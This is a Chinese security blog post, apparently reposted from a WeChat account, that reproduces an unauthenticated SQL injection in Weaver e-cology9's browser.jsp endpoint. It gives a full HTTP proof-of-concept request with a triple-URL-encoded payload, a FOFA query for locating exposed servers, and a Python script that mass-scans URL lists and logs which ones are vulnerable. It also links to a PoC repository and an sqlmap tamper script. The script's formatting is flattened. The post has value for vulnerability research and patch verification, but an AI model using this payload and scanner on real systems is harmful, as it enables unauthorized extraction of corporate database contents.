泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

admin 2023年11月25日15:44:48评论34 views字数 5100阅读17分0秒阅读模式

关注本公众号 ,长期推送漏洞文章

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
漏洞简述
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。
泛微协同管理应用平台(e-cology)包括八大模块:知识文档管理(e-Document),人力资源管理(e-HRM),客户关系管理(e-CRM),项目管理(e-Project),资产管理e-Logistics),财务管理(e-Financials),工作流程管理(e-Workflow),数据中心管理(e-Datacenter)。八个模块像人体的各个功能器官,协同为企业的日常运作提供强劲动力。
由于e-cology OA对用户输入内容的验证存在缺陷。未经身份验证的远程攻击者通过向目标系统发送特制的字符串,最终可实现获取目标数据库中的敏感信息。(SQL注入)
影响版本:
泛微e-cology V9<10.56
漏洞POC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 649
isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37
payload需要经过三次url编码,文末附tamper脚本地址
资产
fofa:app="泛微-协同商务系统"

 

泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

漏洞复现

使用yakit或burp进行抓包改包

泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

 

批量验证脚本:

import requestsfrom termcolor import coloredimport signal
# Disable SSL certificate verificationrequests.packages.urllib3.disable_warnings()
output_file = None  # 全局变量

def check_url(url, output=None):    headers = {        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "zh-CN,zh;q=0.9",        "Connection": "close"    }    proxies = {        'http': 'http://127.0.0.1:8080',        'https': 'http://127.0.0.1:8080'    }
    data = {        "isDis": "1",        "browserTypeId": "269",        "keyword": "%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37"    }
    try:        modified_url = url + '/mobile/%20/plugin/browser.jsp'        response = requests.post(modified_url, data=data, headers=headers, verify=False, timeout=3)        content = response.text
        if "show2" in content:            result = colored(url + " 存在", 'red')
            if output:                with open(output, 'a') as file:  # 以追加模式打开文件                    file.write(url + 'n')
            print(result)  # 即时打印结果        else:            result = url + " 不存在"            print(result)  # 即时打印结果
    except requests.exceptions.RequestException as e:        pass  # 不进行任何操作,直接请求下一个URL

def check_urls_from_file(filename, output=None):    with open(filename, 'r') as file:        url_list = file.read().strip().split('n')
    for url in url_list:        check_url(url, output)
        # 捕获中断信号        signal.signal(signal.SIGINT, handle_interrupt)

def handle_interrupt(signum, frame):    global output_file
    # 在捕获中断时保存当前扫描结果,并关闭文件    if output_file:        output_file.close()
    print("n扫描已中断并保存当前结果。")    exit()

def main():    global output_file
    parser = argparse.ArgumentParser(description='CNVD-2023-12632检测POC')    parser.add_argument('-u', '--url', help='检测单个URL')    parser.add_argument('-r', '--file', help='从文本中批量检测URL')    parser.add_argument('-o', '--output', help='将检测到的输出到文本中')    args = parser.parse_args()
    if args.output:        output_file = open(args.output, 'a')  # 以追加模式打开输出文件
    if args.url:        check_url(args.url, args.output)    elif args.file:        check_urls_from_file(args.file, args.output)    else:        parser.print_help()
    # 注册捕获中断信号的处理程序    signal.signal(signal.SIGINT, handle_interrupt)
    # 关闭输出文件    if output_file:        output_file.close()

 获取漏洞验证脚本和sqlmap-tamper脚本。

漏洞验证脚本
https://github.com/SharpKean/CNVD-2023-12632_POC
tamper:
https://github.com/ChinaRan0/3url

 

原文始发于微信公众号(知攻善防实验室):泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月25日15:44:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]https://cn-sec.com/archives/2239181.html

发表评论

匿名网友 填写信息